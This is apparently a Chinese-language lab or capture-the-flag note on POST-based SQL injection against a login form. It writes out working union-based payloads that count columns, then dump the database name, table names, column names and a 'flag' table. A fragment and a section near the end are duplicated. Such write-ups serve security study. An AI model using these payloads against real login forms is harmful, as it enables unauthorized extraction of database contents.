SQL注入–POST注入
SQL注入回顾:网络安全笔记-99-渗透-SQL注入
POST注入
POST型注入与GET型注入没有本质区别
POST注入一
输入账号密码,然后抓包
检测出单引号闭合的方式,接下来就可以进行注入.
检测出字段数
- username=admin’ order by 3–+&password=1&submit=%E7%99%BB%E5%BD%95
检测回显点
![]
爆库
- username=admin1’ union select 1,2,database()–+&password=1&submit=%E7%99%BB%E5%BD%95
爆表
- username=admin1’ union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())–+&password=1&submit=%E7%99%BB%E5%BD%95
爆字段
- username=admin1’ union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘flag’)–+&password=1&submit=%E7%99%BB%E5%BD%95
爆数据
- username=admin1’ union select 1,2,(select group_concat(flag) from flag)–+&password=1&submit=%E7%99%BB%E5%BD%95
获得flag.
POST注入二
原理相同,只是闭合方式为")
88970)]
获得flag.
POST注入二
原理相同,只是闭合方式为")